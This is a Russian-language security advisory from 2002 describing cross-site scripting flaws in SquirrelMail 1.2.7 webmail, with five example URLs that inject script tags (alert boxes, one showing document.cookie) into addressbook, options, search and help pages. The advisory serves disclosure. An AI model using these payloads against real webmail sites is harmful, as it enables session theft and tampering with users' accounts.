Межайтовый скриптинг в SquirrelMail

Дата публикации:
24.09.2002
Всего просмотров:
987
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Неавторизованное изменение данных
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
SquirrelMail 1.x
Описание: SquirrelMail - webmail программа, осуществленная в PHP4, для Linux, и Unix систем. Несколько уязвимостей межсайтового скриптинга обнаружено в различных PHP сценариях, поставляемых с SquirrelMail. Уязвимость позволяет атакующему выполнять произвольный код сценария в контексте уязвимого сайта, осуществляя различные нападения против Web приложений. Пример:
 
http://<VULNERABLE 
SITE>.net/webmail/src/addressbook.php?"><script>alert(document.cookie)</scri 
pt><!-- 

http://<VULNERABLE 
SITE>.net/webmail/src/options.php?optpage=<script>alert('boop!')</script> 

http://<VULNERABLE 
SITE>.net/webmail/src/search.php?mailbox=<script>alert('boop!')</script>&wha 
t=x&where=BODY&submit=Search 

http://<VULNERABLE 
SITE>.net/webmail/src/search.php?mailbox=INBOX&what=x&where=<script>alert('b 
oop!')</script>&submit=Search 

http://<VULNERABLE 
SITE>.net/webmail/src/help.php?chapter=<script>alert('boop!')</script>
уязвимость обнаружена в SquirrelMail 1.2.7

Ссылки: Squirrel Mail 1.2.7 XSS Exploit
или введите имя

CAPTCHA